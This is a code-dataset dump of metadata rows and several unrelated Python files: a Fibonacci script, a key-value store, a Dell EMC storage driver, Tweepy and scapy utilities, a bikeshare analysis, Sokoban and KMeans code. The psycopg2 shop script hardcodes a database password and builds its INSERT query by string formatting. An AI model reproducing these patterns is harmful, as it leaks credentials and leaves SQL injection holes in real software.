blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
261
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
45
| license_type
stringclasses 2
values | repo_name
stringlengths 8
111
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 72
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 530k
616M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
24.6k
| gha_license_id
stringclasses 9
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 40
values | src_encoding
stringclasses 10
values | language
stringclasses 1
value | is_vendor
bool 1
class | is_generated
bool 2
classes | length_bytes
int64 11
4.05M
| extension
stringclasses 25
values | content
stringlengths 10
4.04M
| authors
sequencelengths 1
1
| author_id
stringclasses 578
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1b1d43ac638223550a5a9f28cb4d5f216a837cbf | 1fac53ab13a9a682ecd926857ef565fa779afae4 | /fbseries.py | 44da677508725917468869fb71285e9ed733a195 | [] | no_license | Shamabanu/python-1 | 339123ff4e7667d6331c207cb1c7ca3fc775dc48 | 4c1642679bb0bdd53a1d21e5421e04eb7abda65b | refs/heads/master | 2020-04-13T23:49:27.700807 | 2018-12-29T15:10:26 | 2018-12-29T15:10:26 | 163,516,492 | 1 | 0 | null | 2018-12-29T14:16:28 | 2018-12-29T14:16:28 | null | UTF-8 | Python | false | false | 219 | py | def fibonacci(n):
if(n <= 1):
return n
else:
return(fibonacci(n-1) + fibonacci(n-2))
n = int(input("Enter no of terms:"))
print("Fibonacci sequence:")
for i in range(n):
print (fibonacci(i))
| [
"[email protected]"
] | |
ceb00ada558194b136dbe08db9825882d460d300 | 577341517a9aa9f94afac9c9b1ca5efbf39bbf02 | /initial.py | 2a5e707232a35b2fd7bdce64b724911033252ff2 | [] | no_license | prathyu0398/Freshworks_assignment | 7276dde9aabb9536aa519fd7c861cd133c577f92 | 02cf03ae47ef2ab7d6aa7e7aa72533e46a1da100 | refs/heads/main | 2023-01-29T03:00:13.984100 | 2020-12-01T08:07:18 | 2020-12-01T08:07:18 | 317,468,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,852 | py | import threading
from threading import *
import time
import json
#https://github.com/sriharsha9598/CRD-operations-of-a-file-based-key-value-data-store
f=open("data.json",)
d=json.load(f)
def create(key, value, timeout=0):
if key in d:
print("error: this key already exists") # error message1
else:
if (key.isalpha()):
if len(d) < (1024 * 1020 * 1024) and value <= (
16 * 1024 * 1024):
if timeout == 0:
l = [value, timeout]
else:
l = [value, time.time() + timeout]
if len(key) <= 32: # constraints for input key_name capped at 32chars
d[key] = l
else:
print("Error: Memory limit exceeded!! ") # error message2
else:
print(
"Error: Invalind key_name!! key_name must contain only alphabets and no special characters or numbers") # error message3
def read(key):
if key not in d:
print("Error: given key does not exist in database. Please enter a valid key") # error message4
else:
b = d[key]
if b[1] != 0:
if time.time() < b[1]:
stri = str(key) + ":" + str(
b[0])
return stri
else:
print("Error: time-to-live of", key, "has expired") # error message5
else:
stri = str(key) + ":" + str(b[0])
return stri
def delete(key):
if key not in d:
print("Error: Given key does not exist in database. Please enter a valid key") # error message4
else:
b = d[key]
if b[1] != 0:
if time.time() < b[1]: # comparing the current time with expiry time
del d[key]
print("key is successfully deleted")
else:
print("error: time-to-live of", key, "has expired") # error message5
else:
del d[key]
print("key is successfully deleted")
def modify(key, value):
b = d[key]
if b[1] != 0:
if time.time() < b[1]:
if key not in d:
print("error: given key does not exist in database. Please enter a valid key") # error message6
else:
l = []
l.append(value)
l.append(b[1])
d[key] = l
else:
print("error: time-to-live of", key, "has expired") # error message5
else:
if key not in d:
print("error: given key does not exist in database. Please enter a valid key") # error message6
else:
l = []
l.append(value)
l.append(b[1])
d[key] = l
| [
"[email protected]"
] | |
c1dc9b8de82a537e52ed23b956fe00cfff4c98ee | 2db67c3d6d4ec252f3e76ce6e92f258c4e1fbf73 | /delfin/drivers/dell_emc/unity/unity.py | 7652a09592639cd3844daf83fc8c520d00d832a2 | [
"Apache-2.0"
] | permissive | jiangyutan/delfin | 2b74ed2473f2e42f8cc1d185a8ac4c0835035bd0 | d63b5f19efabc1c6ef94f0244e9f89c2ecceb7ed | refs/heads/v0.8.0-maint | 2023-05-04T21:18:08.539343 | 2021-03-15T08:00:53 | 2021-03-15T08:00:53 | 286,358,774 | 0 | 0 | Apache-2.0 | 2020-08-10T02:38:37 | 2020-08-10T02:38:36 | null | UTF-8 | Python | false | false | 8,054 | py | # Copyright 2020 The SODA Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log
from delfin.common import constants
from delfin.drivers import driver
from delfin.drivers.dell_emc.unity import rest_handler, alert_handler, consts
from delfin.drivers.dell_emc.unity.alert_handler import AlertHandler
LOG = log.getLogger(__name__)
class UNITYStorDriver(driver.StorageDriver):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.rest_handler = rest_handler.RestHandler(**kwargs)
self.rest_handler.login()
def reset_connection(self, context, **kwargs):
self.rest_handler.logout()
self.rest_handler.verify = kwargs.get('verify', False)
self.rest_handler.login()
def close_connection(self):
self.rest_handler.logout()
def get_storage(self, context):
system_info = self.rest_handler.get_storage()
capacity = self.rest_handler.get_capacity()
version_info = self.rest_handler.get_soft_version()
disk_info = self.rest_handler.get_disk_info()
status = constants.StorageStatus.OFFLINE
if system_info is not None and capacity is not None:
system_entries = system_info.get('entries')
for system in system_entries:
name = system.get('content').get('name')
model = system.get('content').get('model')
serial_number = system.get('content').get('serialNumber')
health_value = system.get('content').get('health').get('value')
if health_value in consts.HEALTH_OK:
status = constants.StorageStatus.NORMAL
else:
status = constants.StorageStatus.ABNORMAL
break
capacity_info = capacity.get('entries')
for per_capacity in capacity_info:
free = per_capacity.get('content').get('sizeFree')
total = per_capacity.get('content').get('sizeTotal')
used = per_capacity.get('content').get('sizeUsed')
subs = per_capacity.get('content').get('sizeSubscribed')
break
soft_version = version_info.get('entries')
for soft_info in soft_version:
version = soft_info.get('content').get('id')
break
disk_entrier = disk_info.get('entries')
raw = 0
for disk in disk_entrier:
raw = raw + int(disk.get('content').get('rawSize'))
result = {
'name': name,
'vendor': 'DELL EMC',
'model': model,
'status': status,
'serial_number': serial_number,
'firmware_version': version,
'location': '',
'subscribed_capacity': int(subs),
'total_capacity': int(total),
'raw_capacity': int(raw),
'used_capacity': int(used),
'free_capacity': int(free)
}
return result
def list_storage_pools(self, context):
pool_info = self.rest_handler.get_all_pools()
pool_list = []
pool_type = constants.StorageType.BLOCK
if pool_info is not None:
pool_entries = pool_info.get('entries')
for pool in pool_entries:
health_value = pool.get('content').get('health').get('value')
if health_value in consts.HEALTH_OK:
status = constants.StorageStatus.NORMAL
else:
status = constants.StorageStatus.ABNORMAL
p = {
'name': pool.get('content').get('name'),
'storage_id': self.storage_id,
'native_storage_pool_id': str(
pool.get('content').get('id')),
'description': pool.get('content').get('description'),
'status': status,
'storage_type': pool_type,
'total_capacity': int(pool.get('content').
get('sizeTotal')),
'subscribed_capacity': int(pool.get('content').get(
'sizeSubscribed')),
'used_capacity': int(pool.get('content').get('sizeUsed')),
'free_capacity': int(pool.get('content').get('sizeFree'))
}
pool_list.append(p)
return pool_list
def volume_handler(self, volumes, volume_list):
if volumes is not None:
vol_entries = volumes.get('entries')
for volume in vol_entries:
total = volume.get('content').get('sizeTotal')
used = volume.get('content').get('sizeAllocated')
vol_type = constants.VolumeType.THICK
if volume.get('content').get('isThinEnabled') is True:
vol_type = constants.VolumeType.THIN
compressed = True
deduplicated = volume.get('content').\
get('isAdvancedDedupEnabled')
health_value = volume.get('content').get('health').get('value')
if health_value in consts.HEALTH_OK:
status = constants.StorageStatus.NORMAL
else:
status = constants.StorageStatus.ABNORMAL
v = {
'name': volume.get('content').get('name'),
'storage_id': self.storage_id,
'description': volume.get('content').get('description'),
'status': status,
'native_volume_id': str(volume.get('content').get('id')),
'native_storage_pool_id':
volume.get('content').get('pool').get('id'),
'wwn': volume.get('content').get('wwn'),
'type': vol_type,
'total_capacity': int(total),
'used_capacity': int(used),
'free_capacity': int(total - used),
'compressed': compressed,
'deduplicated': deduplicated
}
volume_list.append(v)
def list_volumes(self, context):
page_size = 1
volume_list = []
while True:
luns = self.rest_handler.get_all_luns(page_size)
if 'entries' not in luns:
break
if len(luns['entries']) < 1:
break
self.volume_handler(luns, volume_list)
page_size = page_size + 1
return volume_list
def list_alerts(self, context, query_para=None):
page_size = 1
alert_model_list = []
while True:
alert_list = self.rest_handler.get_all_alerts(page_size)
if 'entries' not in alert_list:
break
if len(alert_list['entries']) < 1:
break
alert_handler.AlertHandler() \
.parse_queried_alerts(alert_model_list, alert_list, query_para)
page_size = page_size + 1
return alert_model_list
def add_trap_config(self, context, trap_config):
pass
def remove_trap_config(self, context, trap_config):
pass
@staticmethod
def parse_alert(context, alert):
return AlertHandler.parse_alert(context, alert)
def clear_alert(self, context, alert):
return self.rest_handler.remove_alert(context, alert)
| [
"[email protected]"
] | |
c025936563a10774a9b3acd93602aa92bf3b75f8 | 2b7dccfa789bdeff28f306243f5ee04137e131be | /PythonAndCoding/tweettweet.py | ad177cc437e3640df20a5dee289e4f0e18627984 | [] | no_license | animeshsrivastava246/PythonWork | d3a88a65bbf50da3ffb9912ab18dd0126e502c8e | 3bdee1f06fd7faf92b02c37f3361e7e92011c57b | refs/heads/main | 2023-07-13T12:17:05.083860 | 2021-08-16T11:30:42 | 2021-08-16T11:30:42 | 396,763,690 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | import tweepy,time
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
user=api.me()
def limit_handler(cursor):
try:
while True:
yield cursor.next()
except tweepy.RateLimitError:
time.sleep(300)#miliseconds
for follower in limit_handler(tweepy.Cursor(api.followers).items()):
print(follower.name)
#print(user.followers_count)
#print(user.screen_name)
#print(user.name)
#public_tweets = api.home_timeline()
#for tweet in public_tweets:
# print(tweet.text)
# Tweepy.org DOCUMENTATION | [
"[email protected]"
] | |
27b994c3924007d90e49e4fc1c92fc4eef573a45 | 5bc7733ecb92e5c426ba3ff620ffba8da27292f6 | /postGRE_script.py | 08ac3a51cf487cea29986395757646fbbea6f9ed | [] | no_license | CodeyBank/simple-database-using-postgres | 66ac01bfed27ad8b4047bc081c909c22b66bab53 | 29c0ab25cbef664621d84cc659818dfdc720046b | refs/heads/main | 2023-05-19T16:47:53.768820 | 2021-06-05T18:47:08 | 2021-06-05T18:47:08 | 374,189,233 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,147 | py | import psycopg2
def create_table():
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS store (item TEXT, quantity INTEGER, price REAL)")
connection.commit()
connection.close()
def insert(item, quantity, price):
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("INSERT INTO store VALUES('%s', '%s', '%s')" %(item, quantity, price))
#cur.execute("INSERT INTO store VALUES(%s, %s, %s)", (item, quantity, price)) #Alternative method to avoid database injections from hackers
connection.commit()
connection.close()
#insert("Coffee cup", 10, 2.5)
# This function deletes a row. pass the row item as an argument
def delete_item(item):
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("DELETE FROM store WHERE item=%s", (item,)) #when there is only one parameter, always end with ','
connection.commit()
connection.close()
def view_db():
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("SELECT * FROM store")
rows = cur.fetchall() # .fetchall() methodReturns the rows of a DB as a list of a tuples
connection.close()
return rows
def update_db(quantity, price, item):
connection = psycopg2.connect("dbname='shop' user='postgres' password='Thebossm@#995' host='localhost' port='5432'")
cur = connection.cursor()
cur.execute("UPDATE store SET quantity=%s, price=%s WHERE item=%s", (quantity, price, item))
rows = cur.fetchall() # .fetchall() methodReturns the rows of a DB as a list of a tuples
connection.close()
return rows
create_table()
delete_item("Orange")
print(view_db()) | [
"[email protected]"
] | |
10320c2b5c5d228ae3ada19ae71d1c1b9d7fff71 | 77d7f2c1284b276c95ad31b15ac2bde077f1ceca | /fastreid/data/common.py | 959fefb3f17b62bcdefa3071913ff3df58331735 | [
"Apache-2.0"
] | permissive | Cris-zj/fast-reid | a53f19fefe149eec93d0f1b2a1d61136d9c9eaf6 | db4b65444912cfd54675e6a52fa12e2d1321e971 | refs/heads/master | 2022-12-14T15:23:40.820118 | 2020-08-31T12:34:33 | 2020-08-31T12:34:33 | 291,639,026 | 2 | 0 | Apache-2.0 | 2020-08-31T06:56:24 | 2020-08-31T06:56:23 | null | UTF-8 | Python | false | false | 1,078 | py | # encoding: utf-8
"""
@author: liaoxingyu
@contact: [email protected]
"""
from torch.utils.data import Dataset
from .data_utils import read_image
class CommDataset(Dataset):
"""Image Person ReID Dataset"""
def __init__(self, img_items, transform=None, relabel=True):
self.img_items = img_items
self.transform = transform
self.relabel = relabel
pid_set = set([i[1] for i in img_items])
self.pids = sorted(list(pid_set))
if relabel: self.pid_dict = dict([(p, i) for i, p in enumerate(self.pids)])
def __len__(self):
return len(self.img_items)
def __getitem__(self, index):
img_path, pid, camid = self.img_items[index]
img = read_image(img_path)
if self.transform is not None: img = self.transform(img)
if self.relabel: pid = self.pid_dict[pid]
return {
"images": img,
"targets": pid,
"camid": camid,
"img_path": img_path
}
@property
def num_classes(self):
return len(self.pids)
| [
"[email protected]"
] | |
37857bc4bb9559c9e3f68635744baf75a7cc8762 | c086a38a366b0724d7339ae94d6bfb489413d2f4 | /PythonEnv/Lib/site-packages/docutils/utils/urischemes.py | 01335601af86e67266b95a75aa5f0935ea92bcf5 | [] | no_license | FlowkoHinti/Dionysos | 2dc06651a4fc9b4c8c90d264b2f820f34d736650 | d9f8fbf3bb0713527dc33383a7f3e135b2041638 | refs/heads/master | 2021-03-02T01:14:18.622703 | 2020-06-09T08:28:44 | 2020-06-09T08:28:44 | 245,826,041 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,028 | py | # $Id: urischemes.py 8376 2019-08-27 19:49:29Z milde $
# Author: David Goodger <[email protected]>
# Copyright: This module has been placed in the public domain.
"""
`schemes` is a dictionary with lowercase URI addressing schemes as
keys and descriptions as values. It was compiled from the index at
http://www.iana.org/assignments/uri-schemes (revised 2005-11-28)
and an older list at http://www.w3.org/Addressing/schemes.html.
"""
# Many values are blank and should be filled in with useful descriptions.
schemes = {
'about': 'provides information on Navigator',
'acap': 'Application Configuration Access Protocol; RFC 2244',
'addbook': "To add vCard entries to Communicator's Address Book",
'afp': 'Apple Filing Protocol',
'afs': 'Andrew File System global file names',
'aim': 'AOL Instant Messenger',
'callto': 'for NetMeeting links',
'castanet': 'Castanet Tuner URLs for Netcaster',
'chttp': 'cached HTTP supported by RealPlayer',
'cid': 'content identifier; RFC 2392',
'crid': 'TV-Anytime Content Reference Identifier; RFC 4078',
'data': ('allows inclusion of small data items as "immediate" data; '
'RFC 2397'),
'dav': 'Distributed Authoring and Versioning Protocol; RFC 2518',
'dict': 'dictionary service protocol; RFC 2229',
'dns': 'Domain Name System resources',
'eid': ('External ID; non-URL data; general escape mechanism to allow '
'access to information for applications that are too '
'specialized to justify their own schemes'),
'fax': ('a connection to a terminal that can handle telefaxes '
'(facsimiles); RFC 2806'),
'feed': 'NetNewsWire feed',
'file': 'Host-specific file names; RFC 1738',
'finger': '',
'freenet': '',
'ftp': 'File Transfer Protocol; RFC 1738',
'go': 'go; RFC 3368',
'gopher': 'The Gopher Protocol',
'gsm-sms': ('Global System for Mobile Communications Short Message '
'Service'),
'h323': ('video (audiovisual) communication on local area networks; '
'RFC 3508'),
'h324': ('video and audio communications over low bitrate connections '
'such as POTS modem connections'),
'hdl': 'CNRI handle system',
'hnews': 'an HTTP-tunneling variant of the NNTP news protocol',
'http': 'Hypertext Transfer Protocol; RFC 2616',
'https': 'HTTP over SSL; RFC 2818',
'hydra': 'SubEthaEdit URI. See http://www.codingmonkeys.de/subethaedit.',
'iioploc': 'Internet Inter-ORB Protocol Location?',
'ilu': 'Inter-Language Unification',
'im': 'Instant Messaging; RFC 3860',
'imap': 'Internet Message Access Protocol; RFC 2192',
'info': 'Information Assets with Identifiers in Public Namespaces',
'ior': 'CORBA interoperable object reference',
'ipp': 'Internet Printing Protocol; RFC 3510',
'irc': 'Internet Relay Chat',
'iris.beep': 'iris.beep; RFC 3983',
'iseek': 'See www.ambrosiasw.com; a little util for OS X.',
'jar': 'Java archive',
'javascript': ('JavaScript code; evaluates the expression after the '
'colon'),
'jdbc': 'JDBC connection URI.',
'ldap': 'Lightweight Directory Access Protocol',
'lifn': '',
'livescript': '',
'lrq': '',
'mailbox': 'Mail folder access',
'mailserver': 'Access to data available from mail servers',
'mailto': 'Electronic mail address; RFC 2368',
'md5': '',
'mid': 'message identifier; RFC 2392',
'mocha': '',
'modem': ('a connection to a terminal that can handle incoming data '
'calls; RFC 2806'),
'mtqp': 'Message Tracking Query Protocol; RFC 3887',
'mupdate': 'Mailbox Update (MUPDATE) Protocol; RFC 3656',
'news': 'USENET news; RFC 1738',
'nfs': 'Network File System protocol; RFC 2224',
'nntp': 'USENET news using NNTP access; RFC 1738',
'opaquelocktoken': 'RFC 2518',
'phone': '',
'pop': 'Post Office Protocol; RFC 2384',
'pop3': 'Post Office Protocol v3',
'pres': 'Presence; RFC 3859',
'printer': '',
'prospero': 'Prospero Directory Service; RFC 4157',
'rdar': ('URLs found in Darwin source '
'(http://www.opensource.apple.com/darwinsource/).'),
'res': '',
'rtsp': 'real time streaming protocol; RFC 2326',
'rvp': '',
'rwhois': '',
'rx': 'Remote Execution',
'sdp': '',
'service': 'service location; RFC 2609',
'shttp': 'secure hypertext transfer protocol',
'sip': 'Session Initiation Protocol; RFC 3261',
'sips': 'secure session intitiaion protocol; RFC 3261',
'smb': 'SAMBA filesystems.',
'snews': 'For NNTP postings via SSL',
'snmp': 'Simple Network Management Protocol; RFC 4088',
'soap.beep': 'RFC 3288',
'soap.beeps': 'RFC 3288',
'ssh': 'Reference to interactive sessions via ssh.',
't120': 'real time data conferencing (audiographics)',
'tag': 'RFC 4151',
'tcp': '',
'tel': ('a connection to a terminal that handles normal voice '
'telephone calls, a voice mailbox or another voice messaging '
'system or a service that can be operated using DTMF tones; '
'RFC 3966.'),
'telephone': 'telephone',
'telnet': 'Reference to interactive sessions; RFC 4248',
'tftp': 'Trivial File Transfer Protocol; RFC 3617',
'tip': 'Transaction Internet Protocol; RFC 2371',
'tn3270': 'Interactive 3270 emulation sessions',
'tv': '',
'urn': 'Uniform Resource Name; RFC 2141',
'uuid': '',
'vemmi': 'versatile multimedia interface; RFC 2122',
'videotex': '',
'view-source': 'displays HTML code that was generated with JavaScript',
'wais': 'Wide Area Information Servers; RFC 4156',
'whodp': '',
'whois++': 'Distributed directory service.',
'x-man-page': ('Opens man page in Terminal.app on OS X '
'(see macosxhints.com)'),
'xmlrpc.beep': 'RFC 3529',
'xmlrpc.beeps': 'RFC 3529',
'z39.50r': 'Z39.50 Retrieval; RFC 2056',
'z39.50s': 'Z39.50 Session; RFC 2056', }
| [
"="
] | = |
d7a475241f3c8632512754d85bd07dc6b8525b48 | 6b5142b5def59556942f91411a792ac5d15fc427 | /l2tshoot.py | 7ae899cee162ca115d4f8d2adc564046b703a3f2 | [] | no_license | karthiksjsu/codedump | 2a9c9ee4f75deba0b8cc8f460afd3b85f1ff239a | ac94fc8a259023ba804c0e587f72a9dfed89bbd6 | refs/heads/master | 2021-01-19T17:02:36.274907 | 2017-04-14T21:14:14 | 2017-04-14T21:14:14 | 88,301,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 627 | py | import logging
logging.getLogger("scapy runtime").setLevel(logging.ERROR)
from scapy.all import *
dstip=raw_input("Enter the IP for which the status needs to be checked\n")
logging.info("constructing ARP message")
arp=ARP()
arp.hwdst='00:00:00:00:00:00'
arp.hwsrc='08:00:27:dd:f5:3a'
arp.pdst=dstip
arp.src='10.0.2.15'
ether=Ether()
ether.dst='FF:FF:FF:FF:FF:FF'
ether.src='08:00:27:dd:f5:3a'
packet=ether/arp
reply=srp1(packet,timeout=5,verbose=0)
if(reply):
print "Layer2 status is up and at " +reply.src
#print reply.show()
else:
print "Layer2 status is down"
logging.warning(" Status is down")
| [
"[email protected]"
] | |
cc35858bc95f4683d14d95919f9519628e61c9bc | 79067556d586128deadc846098010059d20f60e2 | /bikeshare.py | becb19cf9c26bfd2ec8cc95528a0b9e8cfc5025b | [] | no_license | mohamedkhnour/Explore-US-Bikeshare-Data | 656fe2f1bf39e9ea1aceefbc2c792940c0a69b8d | 87ca4bf6fba60cfbdf86653614ad85a00f40ffdb | refs/heads/main | 2023-04-08T16:15:10.654637 | 2021-04-15T20:11:38 | 2021-04-15T20:11:38 | 358,376,362 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,834 | py | import time
import pandas as pd
import numpy as np
CITY_DATA = { 'ch': 'chicago.csv',
'ny': 'new_york_city.csv',
'w': 'washington.csv' }
def get_filters():
# TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs
city_selection = input('to view available BS data, kindly type: \n The letter(ch) for Chicago \n The letter (ny) for New York City \n The letter (W) for Washington \n').lower()
while city_selection not in {'ch','ny','w'}:
print('that is invalid input .')
city_selection = input('to view available BS data, kindly type: \n The letter(ch) for Chicago \n The letter (ny) for New York City \n The letter (W) for Washington \n').lower()
# TO DO: get user input for month (all, january, february, ... , june)
monthes=['january','february','march','april','may','june','all']
month_selection = input('select month \n January \n February\n March\n April\n May\n June\n ALL\n').lower()
while month_selection not in monthes:
print('that is invalid input .')
month_selection = input('select month \nJA January \nFE February\n MA March\n AP April\n MA May\n JU June\n ALL\n').lower()
# TO DO: get user input for day of week (all, monday, tuesday, ... sunday)
day_selection =input('select Day \nMonday \nTuesday\nWednesday\n Thursday\nFriday\n Saturday\n Sunday\n ALL').lower()
days=['monday', 'tuesday', 'wednesday', 'thursday','friday', 'saturday', 'sunday','all']
while day_selection not in days:
print('that is invalid input .')
day_selection = input('select Day \nMonday \nTuesday\nWednesday\n Thursday\nFriday\n Saturday\n Sunday\n ALL').lower()
print('-'*40)
return city_selection, month_selection, day_selection
def load_data(city, month, day):
"""
Loads data for the specified city and filters by month and day if applicable.
Args:
(str) city - name of the city to analyze
(str) month - name of the month to filter by, or "all" to apply no month filter
(str) day - name of the day of week to filter by, or "all" to apply no day filter
Returns:
df - Pandas DataFrame containing city data filtered by month and day
"""
# load data file into a dataframe
df = pd.read_csv(CITY_DATA[city])
# convert the Start Time column to datetime
df['Start Time'] = pd.to_datetime(df['Start Time'])
# extract month and day of week from Start Time to create new columns
df['month'] = df['Start Time'].dt.month
df['day_of_week'] = df['Start Time'].dt.weekday_name
# filter by month if applicable
if month != 'all':
# use the index of the months list to get the corresponding int
months = ['january', 'february', 'march', 'april', 'may', 'june']
month = months.index(month) + 1
# filter by month to create the new dataframe
df = df[df['month'] == month]
# filter by day of week if applicable
if day != 'all':
# filter by day of week to create the new dataframe
df = df[df['day_of_week'] == day.title()]
return df
return df
def time_stats(df1):
"""Displays statistics on the most frequent times of travel."""
df = df1
print('\nCalculating The Most Frequent Times of Travel...\n')
start_time = time.time()
df['Start Time'] = pd.to_datetime(df['Start Time'])
# TO DO: display the most common month
df['month'] = df['Start Time'].dt.month
popular_month = df['month'].mode()[0]
print('Most Popular Start month:', popular_month)
# TO DO: display the most common day of week
df['day'] = df['Start Time'].dt.dayofweek
popular_day = df['day'].mode()[0]
print('Most Popular Start month:', popular_day)
# TO DO: display the most common start hour
df['hour'] = df['Start Time'].dt.hour
popular_hour = df['hour'].mode()[0]
print('Most Popular Start Hour:', popular_hour)
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
return(time.time() - start_time)
def station_stats(df1):
"""Displays statistics on the most popular stations and trip."""
print('\nCalculating The Most Popular Stations and Trip...\n')
start_time = time.time()
df = df1
# TO DO: display most commonly used start station
common_start_station = df['Start Station'].mode()[0]
print("The most start station from data is: " + common_start_station)
# TO DO: display most commonly used end station
common_end_station = df['End Station'].mode()[0]
print("The most end station is: " + common_end_station)
# TO DO: display most frequent combination of start station and end station trip
frequent_combination = (df['Start Station'] + "||" + df['End Station']).mode()[0]
print("The moststart station and end station trip is : " + str(frequent_combination.split("||")))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def trip_duration_stats(df):
"""Displays statistics on the total and average trip duration."""
print('\nCalculating Trip Duration...\n')
start_time = time.time()
# TO DO: display total travel time
total_travel_time = df['Trip Duration'].sum()
print("The total travel time from the given fitered data is: " + str(total_travel_time))
# TO DO: display mean travel time
mean_travel_time = df['Trip Duration'].mean()
print("The mean travel time from the given fitered data is: " + str(mean_travel_time))
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
def user_stats(df):
"""Displays statistics on bikeshare users."""
print('\nCalculating User Stats...\n')
start_time = time.time()
# TO DO: Display counts of user types
gender = df['Gender'].value_counts()
print("The count of user gender from the given fitered data is: \n" + str(gender))
# TO DO: Display counts of gender
earliest_birth = df['Birth Year'].min()
most_recent_birth = df['Birth Year'].max()
most_common_birth = df['Birth Year'].mode()[0]
print('Earliest birth from the given fitered data is: {}\n'.format(earliest_birth))
print('Most recent birth from the given fitered data is: {}\n'.format(most_recent_birth))
print('Most common birth from the given fitered data is: {}\n'.format(most_common_birth) )
# TO DO: Display earliest, most recent, and most common year of birth
print("\nThis took %s seconds." % (time.time() - start_time))
print('-'*40)
'''def main():
city,month,day=get_filters()
df=load_data(city,month,day)
#print(df.head())
time_stats(df)
station_stats(df)
trip_duration_stats(df)
if city=='ch':
user_stats(df)'''
def display_raw_data(df):
print(df.head())
next = 0
while True:
view_raw_data = input('\nWould you like to view next five row of raw data? Enter yes or no.\n')
if view_raw_data.lower() != 'yes':
return
next = next + 5
print(df.iloc[next:next+5])
def main():
while True:
city, month, day = get_filters()
df = load_data(city, month, day)
time_stats(df)
station_stats(df)
trip_duration_stats(df)
if city=='ch':
user_stats(df)
while True:
view_raw_data = input('\nWould you like to view first five row of raw data? Enter yes or no.\n')
if view_raw_data.lower() != 'yes':
break
display_raw_data(df)
break
restart = input('\nWould you like to restart? Enter yes or no.\n')
if restart.lower() != 'yes':
break
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
3da20a20d29aa2f522c83f995e511782028cfdd3 | c405becd9f1a66dc3675adb106db01a7aedec840 | /sokoban.py | d327733d2888ea940d0e148d4f9ef6e8913deabd | [] | no_license | ssonkar/Sokoban-Solver | 7897f115497cb05f11d1401c9232f8264daa59f8 | 31a001de38327e5764c941f1e729b888ee988364 | refs/heads/master | 2020-04-10T10:45:09.673727 | 2018-12-08T23:25:36 | 2018-12-08T23:25:36 | 160,974,810 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | from board import Board
#from boardastar import Boardastar
import bfs
import ucs
import ass
class Sokoban:
'''
Sokoban game class
'''
def new_board(self, filename):
''' Creates new board from file '''
e = [] # empty solution list
b = Board(e)
with open(filename, 'r') as f: # automatically closes file
read_data = f.read()
lines = read_data.split('\n')
height = lines.pop(0)
x = 0
y = 0
for line in lines:
for char in line:
# adds Spots to board's sets by reading in char
if char == '#':
b.add_wall(x, y)
elif char == '.':
b.add_goal(x, y)
elif char == '@':
b.set_player(x, y)
elif char == '+':
# player gets its own Spot marker
b.set_player(x, y)
b.add_goal(x, y)
elif char == '$':
b.add_box(x, y)
elif char == '*':
b.add_box(x, y)
b.add_goal(x, y)
x += 1
y += 1
x = 0
# check for a board with no player
if hasattr(b, 'player'):
return b
else:
print("No player on board")
return None
def doSearches(self, board, option):
if option == 1:
bfs.search(board)
if option == 2:
ucs.search(board)
if option == 3:
board.isAstar = True
ass.search(board)
| [
"[email protected]"
] | |
90efc2d698bbd5551213318accc27bd6f924e258 | b7799e8cb21cb2d4c0a526a6f9395a3c620514f9 | /Tagging/KMeans.py | a5225641d480ed11c287e9a13d3760b89448fd5c | [] | no_license | Sivler9/IA_PR2_Color_Tagging | cc664eb2ac24c18612970f0dea5b042d6d9ebe89 | 1148a205c5e2fca32ffbaa832efe4dbb54ecb03a | refs/heads/master | 2020-03-13T07:47:36.215000 | 2018-05-29T20:31:51 | 2018-05-29T20:31:51 | 131,031,661 | 1 | 0 | null | 2018-05-15T07:38:21 | 2018-04-25T16:04:53 | Python | UTF-8 | Python | false | false | 15,838 | py | """
@author: ramon, bojana
"""
import numpy as np
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d.axes3d as axes3d
from sklearn.decomposition import PCA
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.metrics.pairwise import pairwise_distances_argmin
import sklearn.metrics as metricas
import scipy
import scipy.cluster.vq
import scipy.spatial.distance
from sklearn.cluster import KMeans as camins
def gap(data, nrefs=3, maxClusters=15):
"""
Calculates KMeans optimal K using Gap Statistic from Tibshirani, Walther, Hastie
Params:
data: ndarry of shape (n_samples, n_features)
